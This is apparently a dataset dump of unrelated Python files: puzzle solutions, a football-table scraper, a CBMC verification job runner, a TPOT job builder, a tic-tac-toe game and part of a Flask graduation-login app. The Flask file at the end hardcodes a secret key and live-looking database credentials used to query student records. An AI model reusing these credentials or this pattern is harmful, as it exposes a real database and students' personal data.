  'conditions': 'is_going_to_mathneq'\n        },\n        {\n            'trigger': 'go_back',\n            'source': [\n                'sorry',\n                'suck',\n                'astroDetail',\n                'matheq',\n                'mathneq'\n            ],\n            'dest': 'user'\n        }\n    ],\n    initial='init',\n    auto_transitions=True,\n    show_conditions=True,\n)\n\n\ndef _set_webhook():\n    status = bot.set_webhook(WEBHOOK_URL)\n    if not status:\n        print('Webhook setup failed')\n        sys.exit(1)\n    else:\n        print('Your webhook URL has been set to \"{}\"'.format(WEBHOOK_URL))\n\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n    print('In handler')\n    update = telegram.Update.de_json(request.get_json(force=True), bot)\n    machine.advance(update)\n    return 'ok'\n\n\n@app.route('/show-fsm', methods=['GET'])\ndef show_fsm():\n    byte_io = BytesIO()\n    machine.graph.draw(byte_io, prog='dot', format='png')\n    byte_io.seek(0)\n    return send_file(byte_io, attachment_filename='fsm.png', mimetype='image/png')\n\n\nif __name__ == \"__main__\":\n    _set_webhook()\n    
app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"616766169","text":"import sys\n\n\ndef problem1(s):\n result = {0: 151, 1: 0, 2: 0}\n for layer in range(100):\n count = {0: 0, 1: 0, 2: 0}\n for pixel in range(150):\n pixel_value = int(s[layer * 150 + pixel])\n count[pixel_value] += 1\n if count[0] < result[0]:\n result = count\n print(result[1] * result[2])\n\n\ndef problem2(s):\n image = \"\"\n for pixel in range(150):\n for layer in range(100):\n pixel_value = int(s[layer * 150 + pixel])\n if pixel_value != 2:\n image += \"*\" if pixel_value == 1 else \" \"\n break\n for start_pos in range(0, 150, 25):\n print(image[start_pos:start_pos + 25])\n\n\nwith open(sys.argv[1], \"r\") as f:\n line = f.readline()\n problem1(line)\n problem2(line)\n","sub_path":"2019/Day08/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"325176074","text":"#Python Solution Rotating Prime Number\n\n\ndef isPrime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n for i in range(2, int((n + 1) ** .5 + 1)):\n if n % i == 0:\n return False\n return True\n\n\ndef rotate_list(n):\n result = []\n new_num = str(n)\n for i in range(len(str(n))):\n new_num = new_num[1:] + new_num[0]\n if isPrime(int(new_num)):\n result.append(int(new_num))\n else:\n return False\n # print(result)\n return True\n\n\nz = int(input('Enter upper limit number: '))\nres_list = []\nfor i in range(z+1):\n if isPrime(i):\n if rotate_list(i):\n res_list.append(i)\ncount = len(res_list)\nprint('There are {} circular prime numbers, the list is {}'.format(count, res_list))","sub_path":"Q0002_rotatingPrime.py","file_name":"Q0002_rotatingPrime.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"473212769","text":"# QUESTION:\r\n# This is an interview question asked by Quora.\r\n# Given a string, find the palindrome that can be made by inserting the fewest number\r\n# of characters as possible anywhere in the word. If there is more than one palindrome\r\n# of minimum length that can be made, return the lexicographically earliest one (the first\r\n# one alphabetically). 
For example, given the string \"race\", you should return \"ecarace\",\r\n# since we can add three letters to it (which is the smallest amount to make a palindrome).\r\n# There are seven other palindromes that can be made from \"race\" by adding three letters, but\r\n# \"ecarace\" comes first alphabetically.\r\n# As another example, given the string \"google\", you should return \"elgoogle\".\r\n\r\ndef f_min_insert(s): \r\n if s == s[::-1]: \r\n return s\r\n if s[0] == s[-1]: \r\n return s[0] + f_min_insert(s[1:-1]) + s[-1]\r\n else:\r\n sl = s[0] + f_min_insert(s[1:]) + s[0]\r\n sr = s[-1] + f_min_insert(s[:-1]) + s[-1]\r\n if len(sl) > len(sr):\r\n return sr\r\n elif len(sl) < len(sr):\r\n return sl\r\n return sl if sl < sr else sr","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"266867810","text":"import scrapy\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nfrom scrapy.selector import Selector\nfrom tables_crawler.items import TablesCrawlerItem\n\nclass TableSpider(scrapy.Spider):\n name = \"Tables\"\n allowed_domains = [\"premierleague.com\"]\n start_urls = [\"https://www.premierleague.com/tables\"]\n \n def __init__(self):\n scrapy.Spider.__init__(self)\n self.browser = webdriver.Chrome('/Users/hyunilyoo/Documents/analytics/chromedriver')\n \n def parse(self, response):\n self.browser.get(response.url)\n time.sleep(5)\n self.html = self.browser.find_element_by_xpath('//*').get_attribute('outerHTML')\n self.selector = Selector(text=self.html)\n self.season_epl = len(self.selector.xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'))+1\n \n # Season dropdown\n for i in range(2, self.season_epl):\n time.sleep(5)\n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/div[2]').click()\n time.sleep(3)\n\n if i < 10: \n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'+f'[{i}]').click()\n\n elif i >= 10 and i < 19:\n self.browser.execute_script('window.scrollTo(0, 150)')\n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'+f'[{i}]').click()\n\n else:\n self.browser.execute_script('window.scrollTo(0, 330)')\n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'+f'[{i}]').click()\n\n time.sleep(5)\n self.html = self.browser.find_element_by_xpath('//*').get_attribute('outerHTML')\n self.selector = Selector(text=self.html)\n self.rows = self.selector.xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[5]/div/div/div/table/tbody/tr[not(@class=\"expandable\")]')\n\n for row in self.rows:\n self.item = TablesCrawlerItem()\n self.item[\"club_name\"] = row.xpath('./td[3]/a/span[2]/text()')[0].extract()\n self.item[\"position\"] = row.xpath('./td[2]/span[1]/text()')[0].extract()\n self.item[\"won\"] = row.xpath('./td[5]/text()')[0].extract()\n self.item[\"lost\"] = row.xpath('./td[7]/text()')[0].extract()\n self.item[\"drawn\"] = row.xpath('./td[6]/text()')[0].extract()\n self.item[\"goal\"] = row.xpath('./td[8]/text()')[0].extract()\n self.item[\"goal_against\"] = row.xpath('./td[9]/text()')[0].extract()\n self.item[\"points\"] = row.xpath('./td[11]/text()')[0].extract()\n yield self.item\n \n 
self.browser.quit()\n\n","sub_path":"tables_crawler/tables_crawler/spiders/tables_spider.py","file_name":"tables_spider.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"247516306","text":"filename = input('Input filename (without extension):\\n')\n\nfileIn = open(str(filename) + '.txt', 'r')\nlines = []\n\nfor line in fileIn:\n lines.append(line)\n\nlines.sort()\n\nfileOut = open(str(filename) + '_sorted.txt', 'w')\nfor line in lines:\n fileOut.write(line)\n\nprint('Lines in file: ' + str(len(lines)))\nprint('File Sorted!')\n\nfileIn.close()\nfileOut.close()\n","sub_path":"FileAlphabetizer/alphabetizer.py","file_name":"alphabetizer.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"591881953","text":"if __name__ =='__main__':\n students = []\n check = set()\n output = []\n\n for i in range(int(input(\"Enter number of student \"))):\n name = input(\"Enter Students name \")\n score = float(input(\"Enter Students score \"))\n students.append([name,score])\n check.add(score)\n\n second_last = sorted(list(check))[1]\n\n output = [i[0] for i in students if i[1]==second_last]\n output = sorted(output)\n\n for i in output:\n print(i)\n","sub_path":"Python/Nested Lists/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"503556474","text":"# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"Entry point for CBMC job on AWS Batch docker container image\"\"\"\n\nimport datetime\nimport json\nimport subprocess\nimport os\nimport sys\nfrom pprint import pprint\nimport time\nimport shutil\nimport re\n\nimport boto3\n\nimport s3\nimport options\nimport package\n\nPUBLIC_WEBSITE_METADATA = {\"public-website-contents\": \"True\"}\ndef abort(msg):\n \"\"\"Abort a docker container\"\"\"\n sys.stdout.flush()\n print(msg)\n sys.stdout.flush()\n raise UserWarning(msg)\n\ndef install_cbmc(opts):\n \"\"\"Install CBMC binaries\"\"\"\n package.copy('cbmc', opts['pkgbucket'], opts['cbmcpkg'])\n package.install('cbmc', opts['cbmcpkg'], 'cbmc')\n\ndef install_viewer(opts):\n \"\"\"Install the cbmc-viewer tool\"\"\"\n package.copy('cbmc-viewer', opts['pkgbucket'], opts['viewerpkg'])\n package.install('cbmc-viewer', opts['viewerpkg'], 'cbmc-viewer')\n\ndef get_buckets(opts, copysrc=True):\n \"\"\"Copy input buckets to container.\"\"\"\n\n if copysrc:\n if opts['srctarfile']:\n tarfile = s3.key_name(opts['srctarfile'])\n tardir = os.path.dirname(opts['srcdir'].rstrip('/'))\n s3.copy_object_to_file(\n opts['srctarfile'], tarfile, region=opts['region'])\n try:\n os.makedirs(tardir)\n except OSError:\n abort(\"Failed to make directory {}\".format(tardir))\n cmd = ['tar', 'fx', tarfile, '-C', tardir]\n try:\n subprocess.check_call(cmd)\n except subprocess.CalledProcessError:\n abort(\"Failed to run command {}\".format(' '.join(cmd)))\n if not os.path.isdir(opts['srcdir']):\n abort(\"Failed to create {} by untarring {}\"\n .format(opts['srcdir'], opts['srctarfile']))\n else:\n s3.sync_bucket_to_directory(opts['srcbucket'], opts['srcdir'])\n # make scripts in the source tree executable\n subprocess.check_call(['chmod', '+x', '-R', opts['srcdir']])\n s3.sync_bucket_to_directory(opts['wsbucket'], opts['wsdir'])\n 
s3.sync_bucket_to_directory(opts['outbucket'], opts['wsdir'])\n\ndef put_buckets(opts):\n \"\"\"Copy container output to bucket.\"\"\"\n\n s3.sync_directory_to_bucket(opts['wsdir'], opts['outbucket'], metadata=PUBLIC_WEBSITE_METADATA)\n\ndef checkpoint_file(filename, fileobj, s3path, region):\n \"\"\"Write a checkpoint of an open file to a bucket\"\"\"\n\n ckptname = \"chkpt-{}\".format(filename)\n match = re.match(r'(.+)\\.([^.]+)', filename)\n if match:\n ckptname = \"{}-chkpt.{}\".format(match.group(1), match.group(2))\n\n fileobj.flush()\n shutil.copyfile(filename, ckptname)\n s3.copy_file_to_object(\n ckptname, \"{}/{}\".format(s3path, ckptname), region=region)\n\ndef checkpoint_performance(logfile, s3path, taskname, region):\n \"\"\"Write performance information to a logfile in a bucket\"\"\"\n\n gmt = time.gmtime()\n timestamp = (\"{:04d}{:02d}{:02d}-{:02d}{:02d}{:02d}\"\n .format(gmt.tm_year, gmt.tm_mon, gmt.tm_mday,\n gmt.tm_hour, gmt.tm_min, gmt.tm_sec))\n output = subprocess.check_output(['ps', 'ux'])\n cbmc_ps_line = None\n with open(logfile, \"a\") as logobj:\n logobj.write(\"\\n{}\\n\".format(timestamp))\n for line in output.split('\\n'):\n if 'USER' in line:\n logobj.write(line[:80]+'\\n')\n elif 'cbmc' in line:\n logobj.write(line[:80]+'\\n')\n cbmc_ps_line = line.split()\n s3.copy_file_to_object(\n logfile, \"{}/{}\".format(s3path, logfile), region=region)\n\n if not cbmc_ps_line:\n return\n\n client = boto3.client('cloudwatch', region_name=region)\n cloudwatch_timestamp = str(\n datetime.datetime.fromtimestamp(time.mktime(gmt)))\n client.put_metric_data(\n Namespace='CBMC-Batch',\n MetricData=[\n {\n 'MetricName': 'CPU [%]',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Timestamp': cloudwatch_timestamp,\n 'Value': float(cbmc_ps_line[2]),\n 'Unit': 'Percent'\n },\n {\n 'MetricName': 'Memory [%]',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Timestamp': cloudwatch_timestamp,\n 'Value': float(cbmc_ps_line[3]),\n 'Unit': 'Percent'\n },\n {\n 'MetricName': 'Memory [MB]',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Timestamp': cloudwatch_timestamp,\n 'Value': float(cbmc_ps_line[4]) / 1024.0,\n 'Unit': 'Megabytes'\n }\n ])\n\n\ndef run_command(command, outfile, errfile, psfile, opts, delay=10):\n \"\"\"Run command in container\"\"\"\n\n # pylint: disable=too-many-arguments\n\n cwd = os.getcwd()\n os.chdir(opts['wsdir'])\n\n sys.stdout.flush()\n print(\"command = \"+\" \".join(command))\n print(\"outfile = \"+outfile)\n print(\"errfile = \"+errfile)\n print(\"psfile = \"+psfile)\n print(\"options = \")\n pprint(opts)\n print(\"cwd = \"+os.getcwd())\n print(\"PATH = \"+os.environ['PATH'])\n sys.stdout.flush()\n\n print(\"Running command: {}\".format(' '.join(command)))\n\n with open(outfile, \"w\") as outobj, open(errfile, \"w\") as errobj:\n popen = subprocess.Popen(command, universal_newlines=True,\n stdout=outobj, stderr=errobj)\n\n path = opts['outbucket']\n taskname = opts['taskname']\n region = opts['region']\n while popen.poll() is None:\n checkpoint_file(outfile, outobj, path, region)\n checkpoint_file(errfile, errobj, path, region)\n checkpoint_performance(psfile, path, taskname, region)\n time.sleep(delay)\n\n print(\"Command returned error code {}: {}\".format(popen.returncode,\n ' '.join(command)))\n os.chdir(cwd)\n\ndef launch_build(opts):\n \"\"\"Launch the build step\"\"\"\n\n install_cbmc(opts)\n get_buckets(opts)\n print(\"Launching Build\")\n cmd = ['make', 'goto']\n run_command(cmd, 'build.txt', 'build-err.txt', 
'build-ps.txt', opts)\n print(\"Finished Build\")\n put_buckets(opts)\n\ndef launch_property(opts):\n \"\"\"Launch the property step\"\"\"\n\n install_cbmc(opts)\n get_buckets(opts, copysrc=False)\n print(\"Launching Property\")\n\n cmd = ['cbmc', opts['goto']]\n cmd += options.options_dict2words(opts['cbmcflags'])\n cmd += ['--trace']\n run_command(cmd, 'cbmc.txt', 'cbmc-err.txt', 'cbmc-ps.txt', opts)\n\n cmd = ['cbmc', opts['goto']]\n cmd += options.options_dict2words(opts['cbmcflags'])\n cmd += ['--show-properties', '--xml-ui']\n run_command(cmd, 'property.xml', 'property-err.txt', 'property-ps.txt',\n opts)\n\n print(\"Finished Property\")\n put_buckets(opts)\n\ndef launch_coverage(opts):\n \"\"\"Launch the coverage step\"\"\"\n\n install_cbmc(opts)\n get_buckets(opts, copysrc=False)\n print(\"Launching Coverage\")\n\n cmd = ['cbmc', opts['goto']]\n # CBMC forbids --unwinding-assertions with --cover\n cmd += [opt\n for opt in options.options_dict2words(opts['cbmcflags'])\n if not opt in ['--unwinding-assertions',\n '--trace',\n '--stop-on-fail']]\n cmd += ['--cover', 'location', '--xml-ui']\n run_command(cmd, 'coverage.xml', 'coverage-err.txt', 'coverage-ps.txt',\n opts)\n\n print(\"Finished Coverage\")\n put_buckets(opts)\n\ndef launch_report(opts):\n \"\"\"Launch the report step\"\"\"\n\n install_cbmc(opts)\n install_viewer(opts)\n get_buckets(opts)\n print(\"Launching Report\")\n\n cmd = ['cbmc-viewer',\n '--srcdir', opts['srcdir'],\n '--htmldir', 'html',\n '--goto', opts['goto'],\n '--result', 'cbmc.txt',\n '--property', 'property.xml',\n '--block', 'coverage.xml',\n '--blddir', opts['blddir'],\n '--json-summary', 'summary.json'\n ]\n run_command(cmd, 'report.txt', 'report-err.txt', 'report-ps.txt', opts)\n\n print(\"Finished Report\")\n put_buckets(opts)\n\n summary = None\n with open(os.path.join(opts['wsdir'], 'summary.json'), 'r') as j:\n summary = json.load(j)\n if not summary.get('coverage'):\n print(\"Incomplete summary: \" + str(summary))\n return\n\n lines = summary['coverage']['statically-reachable']['lines']\n coverage = (\n float(summary['coverage']['statically-reachable']['hit']) /\n float(lines))\n taskname = opts['taskname']\n client = boto3.client('cloudwatch', region_name=opts['region'])\n client.put_metric_data(\n Namespace='CBMC-Batch',\n MetricData=[\n {\n 'MetricName': 'Coverage',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Value': coverage * 100.0,\n 'Unit': 'Percent'\n },\n {\n 'MetricName': 'Lines of Code',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Value': lines,\n 'Unit': 'None'\n }\n ])\n\n\ndef main():\n \"\"\"Run the job\"\"\"\n\n def more_than_one(bits):\n \"\"\"Test for more than one boolean value True.\"\"\"\n count = 0\n for bit in bits:\n count += int(bit)\n return count > 1\n\n opts = options.docker_options()\n\n print(\"docker options\")\n pprint(opts)\n\n if more_than_one([opts['dobuild'], opts['doproperty'],\n opts['docoverage'], opts['doreport']]):\n print(\"Too many commands passed to docker container.\")\n return\n\n if opts['dobuild']:\n print(\"docker doing build\")\n launch_build(opts)\n return\n\n if opts['doproperty']:\n print(\"docker doing property\")\n launch_property(opts)\n return\n\n if opts['docoverage']:\n print(\"docker doing coverage\")\n launch_coverage(opts)\n return\n\n if opts['doreport']:\n print(\"docker doing report\")\n launch_report(opts)\n return\n\n print(\"docker done\")\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"bin/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":10266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"152707544","text":"#!/usr/bin/env python3\n'''\nTriaging tool to help understand where we need more timing coverage\nFinds correlated variables to help make better test cases\n'''\n\nfrom timfuz import Benchmark, Ar_di2np, loadc_Ads_b, index_names, A_ds2np, simplify_rows\nimport numpy as np\nimport glob\nimport math\nimport json\nimport sympy\nfrom collections import OrderedDict\nfrom fractions import Fraction\nimport random\nfrom sympy import Rational\n\n\ndef intr(r):\n DELTA = 0.0001\n\n for i, x in enumerate(r):\n if type(x) is float:\n xi = int(x)\n assert abs(xi - x) < DELTA\n r[i] = xi\n\n\ndef fracr(r):\n intr(r)\n return [Fraction(x) for x in r]\n\n\ndef fracm(m):\n return [fracr(r) for r in m]\n\n\ndef symratr(r):\n intr(r)\n return [Rational(x) for x in r]\n\n\ndef symratm(m):\n return [symratr(r) for r in m]\n\n\ndef intm(m):\n [intr(r) for r in m]\n return m\n\n\ndef create_matrix(rows, cols):\n ret = np.zeros((rows, cols))\n for rowi in range(rows):\n for coli in range(cols):\n ret[rowi][coli] = random.randint(1, 10)\n return ret\n\n\ndef create_matrix_sparse(rows, cols):\n ret = np.zeros((rows, cols))\n for rowi in range(rows):\n for coli in range(cols):\n if random.randint(0, 5) < 1:\n ret[rowi][coli] = random.randint(1, 10)\n return ret\n\n\ndef run(\n rows=35,\n cols=200,\n verbose=False,\n encoding='np',\n sparse=False,\n normalize_last=True):\n random.seed(0)\n if sparse:\n mnp = create_matrix_sparse(rows, cols)\n else:\n mnp = create_matrix(rows, cols)\n #print(mnp[0])\n\n if encoding == 'fraction':\n msym = sympy.Matrix(fracm(mnp))\n elif encoding == 'np':\n msym = sympy.Matrix(mnp)\n elif encoding == 'sympy':\n msym = sympy.Matrix(symratm(mnp))\n # this actually produces float results\n elif encoding == 'int':\n msym = sympy.Matrix(intm(mnp))\n else:\n assert 0, 'bad encoding: %s' % encoding\n print(type(msym[0]), str(msym[0]))\n\n if verbose:\n print('names')\n print(names)\n print('Matrix')\n sympy.pprint(msym)\n\n print(\n '%s matrix, %u rows x %u cols, sparse: %s, normlast: %s' %\n (encoding, len(mnp), len(mnp[0]), sparse, normalize_last))\n bench = Benchmark()\n try:\n rref, pivots = msym.rref(normalize_last=normalize_last)\n finally:\n print('rref exiting after %s' % bench)\n print(type(rref[0]), str(rref[0]))\n\n if verbose:\n print('Pivots')\n sympy.pprint(pivots)\n print('rref')\n sympy.pprint(rref)\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(\n description='Matrix solving performance tests')\n\n parser.add_argument('--verbose', action='store_true', help='')\n parser.add_argument('--sparse', action='store_true', help='')\n parser.add_argument('--rows', type=int, help='')\n parser.add_argument('--cols', type=int, help='')\n parser.add_argument('--normalize-last', type=int, help='')\n parser.add_argument('--encoding', default='np', help='')\n args = parser.parse_args()\n\n run(\n encoding=args.encoding,\n rows=args.rows,\n cols=args.cols,\n sparse=args.sparse,\n normalize_last=bool(args.normalize_last),\n verbose=args.verbose)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fuzzers/007-timing/minitest/test_unique/perf_test.py","file_name":"perf_test.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"103865783","text":"import logging\nimport os\nfrom datetime import datetime\n\nimport cv2\n\nfrom fishy.helper.helper import get_documents\n\nimport numpy as np\nfrom pyzbar.pyzbar import decode\n\n\ndef get_qr_location(og_img):\n \"\"\"\n code from https://stackoverflow.com/a/45770227/4512396\n \"\"\"\n gray = cv2.bilateralFilter(og_img, 11, 17, 17)\n kernel = np.ones((5, 5), np.uint8)\n erosion = cv2.erode(gray, kernel, iterations=2)\n kernel = np.ones((4, 4), np.uint8)\n img = cv2.dilate(erosion, kernel, iterations=2)\n\n cnt, h = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n valid_crops = []\n for i in range(len(cnt)):\n area = cv2.contourArea(cnt[i])\n if 500 < area < 100000:\n mask = np.zeros_like(img)\n cv2.drawContours(mask, cnt, i, 255, -1)\n x, y, w, h = cv2.boundingRect(cnt[i])\n qr_result = decode(og_img[y:h + y, x:w + x])\n if qr_result:\n valid_crops.append(((x, y, x + w, y + h), area))\n\n return min(valid_crops, key=lambda c: c[1])[0] if valid_crops else None\n\n\n# noinspection PyBroadException\ndef get_values_from_image(img):\n try:\n for qr in decode(img):\n vals = qr.data.decode('utf-8').split(\",\")\n return float(vals[0]), float(vals[1]), float(vals[2])\n\n logging.error(\"FishyQR not found, try restarting the engine\")\n return None\n except Exception:\n logging.error(\"Couldn't read coods, make sure 'crop' calibration is correct\")\n cv2.imwrite(os.path.join(get_documents(), \"fishy_failed_reads\", f\"{datetime.now()}.jpg\"), img)\n return None\n","sub_path":"fishy/engine/fullautofisher/qr_detection.py","file_name":"qr_detection.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"193758037","text":"\ndef create_board():\n \"\"\"Creates a 3x3 board\n\n Returns\n -------\n list\n A list containing three lists, each of which contains three strings\n \"\"\"\n\n board = [\n [' ', ' ', ' '],\n [' ', ' ', ' '],\n [' ', ' ', ' ']\n ]\n return board\n\n\ndef print_board(board):\n \"\"\"Prints a 3x3 board\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n \"\"\"\n\n print(' {} | {} | {} '.format(board[0][0], board[0][1], board[0][2]))\n print('___|___|___')\n print(' {} | {} | {} '.format(board[1][0], board[1][1], board[1][2]))\n print('___|___|___')\n print(' {} | {} | {} '.format(board[2][0], board[2][1], board[2][2]))\n print(' | | ')\n\n\ndef place_sign(board, signs):\n \"\"\"Places the sign on the board\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n signs : list\n A list containing two strings - each string represents a sign\n \"\"\"\n\n try:\n print_board(board)\n row = int(input('Enter a row to place ' + signs[0] + ' (1, 2 or 3): '))\n col = int(input('Enter a col to place ' + signs[0] + ' (1, 2 or 3): '))\n if board[row - 1][col - 1] == ' ':\n board[row - 1][col - 1] = signs[0] # places the sign on the board if the place is free\n else:\n print('THIS PLACE IS OCCUPIED, PLEASE TRY AGAIN')\n place_sign(board, signs)\n except ValueError: # handles a situation when user input can not be converted to an integer\n print('ERROR - ENTER VALID NUMBER ')\n place_sign(board, signs)\n except IndexError: # handles a situation when user input is out of the board's index range\n print('ERROR - ENTER VALID NUMBER ')\n place_sign(board, signs)\n\n\ndef winner_check(board):\n \"\"\"Checks if there is a winner\n\n Parameters\n 
----------\n board : list\n A list containing three lists, each of which contains three strings\n\n Returns\n -------\n bool or str\n False if there is no winner or string representing a winner if there is a winner\n \"\"\"\n\n winner = False\n for i in range(len(board)):\n if board[i][0] == board[i][1] == board[i][2] != ' ': # looks for a winner in the horizontal lines\n winner = board[i][0]\n elif board[0][i] == board[1][i] == board[2][i] != ' ': # looks for a winner in the vertical lines\n winner = board[0][i]\n if board[0][0] == board[1][1] == board[2][2] != ' ': # looks for a winner in the diagonals\n winner = board[0][0]\n elif board[0][2] == board[1][1] == board[2][0] != ' ':\n winner = board[0][2]\n return winner\n\n\ndef draw_check(board):\n \"\"\"Checks if there is a draw\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n\n Returns\n -------\n bool\n True if there is a draw, False if there is no draw\n \"\"\"\n\n for el in board:\n if ' ' in el:\n return False\n return True\n\n\nmy_signs = ['x', 'o']\nmy_board = create_board()\nprint('Welcome to my game ^ ^')\nwhile True:\n if winner_check(my_board):\n print_board(my_board)\n print('The winner is ' + winner_check(my_board))\n break\n elif draw_check(my_board):\n print_board(my_board)\n print('There is a draw')\n break\n place_sign(my_board, my_signs)\n my_signs = my_signs[::-1] # swaps the signs so that players can take turns\n\n\n\n\n\n","sub_path":"games/TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597848848","text":"import time\nimport string\nimport os, sys\nfrom pathlib import Path\n\ndsets = [\n 'Hill_Valley_with_noise',\n 'Hill_Valley_without_noise',\n 'breast-cancer-wisconsin',\n 'car-evaluation',\n 'glass',\n 'ionosphere',\n 'spambase',\n 'wine-quality-red',\n 'wine-quality-white'\n]\n\n#jobname_template = 'eval-{0}-{1}_{2}_{3}'\njobname_prefix = 'tpot-nn'\n\n# Create directories if they don't already exist\nPath(\"./job_files\").mkdir(parents=True, exist_ok=True)\nPath(\"./logs\").mkdir(parents=True, exist_ok=True)\nPath(\"./pipelines\").mkdir(parents=True, exist_ok=True)\nPath(\"./pmlb_data_cache\").mkdir(parents=True, exist_ok=True)\n\ndef make_jobfile(dataset, use_template, use_nn, estimator, solo, n_reps=5):\n \n py_cmd = 'python model_script.py --dataset={0}'.format(dataset)\n if use_nn:\n py_cmd += ' --use_nn'\n if use_template:\n py_cmd += ' --use_template'\n if solo:\n py_cmd += ' --solo'\n py_cmd += ' --estimator_select {0}'.format(estimator)\n \n use_nn_str = 'nn' if use_nn else 'no-nn'\n type_str = 'template' if use_template else 'config'\n dset_str = dataset.lower().translate(str.maketrans('', '', string.punctuation))\n solo_str = 'solo' if solo else 'nosolo'\n\n for rep in range(1, n_reps+1):\n jobname = \"{0}_{1}_{2}_{3}_{4}_{5}_rep{6}_{7}\".format(\n jobname_prefix, estimator, use_nn_str, solo_str, type_str, dset_str, rep, int(time.time())\n )\n\n py_cmd_rep = py_cmd + ' --jobname {0}'.format(jobname)\n\n jobfile_path = 'job_files/{0}.sh'.format(jobname)\n jobfile = open(jobfile_path, 'w')\n jobfile.writelines([\n '#!/bin/bash\\n',\n '#BSUB -J {0}\\n'.format(jobname),\n '#BSUB -q \"epistasis_long\"\\n'\n '#BSUB -o logs/{0}.out\\n'.format(jobname),\n '#BSUB -e logs/{0}.err\\n'.format(jobname),\n '#BSUB -M 10000\\n',\n '\\n',\n '{0}\\n'.format(py_cmd_rep)\n ])\n jobfile.close()\n\n os.system('bsub < ' + 
jobfile_path)\n\nfor dset in dsets:\n for nn in [True, False]:\n for solo_estimator in [True, False]:\n for use_template in [True, False]:\n for model in ['lr', 'mlp', 'all']:\n if (model == 'all') and (solo_estimator == True):\n # It doesn't make sense to do 'all estimators' and NOT search for the best estimator\n continue\n if (use_template) and (solo_estimator == True):\n # Likewise, template option invalidates solo estimator\n continue\n \n # Allow stacking\n make_jobfile(dataset=dset, use_template=use_template,\n use_nn=nn, solo=solo_estimator, estimator=model)\n\n # Don't allow stacking\n make_jobfile(dataset=dset, use_template=use_template,\n use_nn=nn, solo=solo_estimator, estimator=model)\n","sub_path":"ARCHIVE/job_builder.py","file_name":"job_builder.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"373349506","text":"import mysql.connector\nfrom flask import Flask, render_template, flash, redirect, url_for, request\nfrom Flask_blog.forms import RegistrationForm, LoginForm, StudentInfo, QuestionTHForm, OfficeLogin\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '13137a5685deb14119a8bce78825349b'\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html')\n\n\n@app.route(\"/login\", methods = ['POST', 'GET'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n std_id = request.form['username']\n mydb = mysql.connector.connect(\n host = \"graduation.stamford.edu\",\n user = \"graduati_dbadmin\",\n password = \"y5wiE&RfprAnyrJS\",\n database = \"graduati_dbserver\",\n port = \"3306\"\n )\n mycursor = mydb.cursor()\n mycursor.execute(\"SELECT name,student_id,seat_number,registered FROM graduate_students WHERE student_id =%s\",\n (std_id,))\n my_result = mycursor.fetchall()\n if mycursor:\n mycursor.close()\n if mydb:\n mydb.close()\n if my_result:\n if my_result[0][3] == 1:\n current_student = StudentInfo\n current_student.student_name = my_result[0][0]\n current_student.student_id = my_result[0][1]\n current_student.student_seat = my_result[0][2]\n return redirect(url_for('success'))\n else:\n current_student = StudentInfo\n current_student.student_name = my_result[0][0]\n 